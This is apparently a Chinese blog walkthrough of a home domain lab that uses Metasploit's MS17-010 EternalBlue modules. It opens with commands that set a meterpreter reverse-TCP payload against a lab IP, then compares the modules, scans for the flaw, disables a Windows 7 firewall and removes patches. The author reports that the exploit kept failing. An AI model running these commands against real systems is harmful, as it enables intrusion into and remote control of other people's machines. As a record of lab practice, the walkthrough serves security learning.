use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 10.10.10.136
set lport 4444
exploit
首先我们先搜索永恒之蓝模块
模块名称 |
功能描述 |
模块类型差异 |
目标系统差异 |
攻击或操作方式差异 |
|
利用 MS17 - 010 漏洞中的永恒之蓝(EternalBlue)技术,触发 Windows 内核池内存损坏,进而实现远程攻击 |
属于漏洞利用(exploit)模块,旨在直接利用漏洞获取系统权限或执行恶意操作 |
适用于多个 Windows 版本,如 Windows 7、Windows Server 2008 R2 等 |
通过引发内核层面的内存问题来达成攻击目的 |
|
借助 MS17 - 010 漏洞,利用 EternalRomance、EternalSynergy、EternalChampion 等技术,实现远程 Windows 系统的代码执行 |
同样是漏洞利用(exploit)模块,侧重于利用漏洞执行代码 |
支持多种 Windows 系统,包括 Windows 10、Windows Server 2012 等 |
利用特定技术组合来执行远程代码 |
|
作为辅助(auxiliary)模块,借助 MS17 - 010 漏洞相关技术,在远程 Windows 系统上执行命令 |
辅助模块,主要用于在已有漏洞基础上执行简单命令操作,并非直接获取权限 |
针对存在 MS17 - 010 漏洞的 Windows 系统 |
执行用户指定的命令 |
|
辅助扫描(scanner)模块,用于检测目标系统是否存在 MS17 - 010 的 SMB 远程代码执行漏洞 |
辅助扫描模块,核心功能是漏洞检测,而非攻击或执行操作 |
扫描可能存在该漏洞的 Windows 系统 |
通过特定检测机制判断系统是否存在漏洞 |
然后我们先使用扫描模块 扫描漏洞
这里我们需要设置目标信息
这里也可以设置为ip段 也可以设置并发线程 这里我不再演示
这个ad01没有
我们在设置别的
设置win7
这个的意思是 连接超时 那就应该是win7开启防火墙了
所以我们要把防火墙关掉
因为我们在一个域中 再加上我们的权限不够 所以我们要输入域控管理员的密码
输入成功后 我们进行关闭
然后我们再来运行
这个意思就是 可能有漏洞
那摩我们就要换一换扫描模块
我们要换成攻击模块
那我们就使用有win7的攻击模块
这里展示我们的攻击载荷
这个是我们的默认的攻击载荷
那摩我们开始设置
然后我们输入
run
开始执行
一直失败 那摩 我们就看看是不是打补丁了win7
这里我们已经把补丁全部删除
这里还是没有成功 博主这里不知道了
按道理就应该是能成功地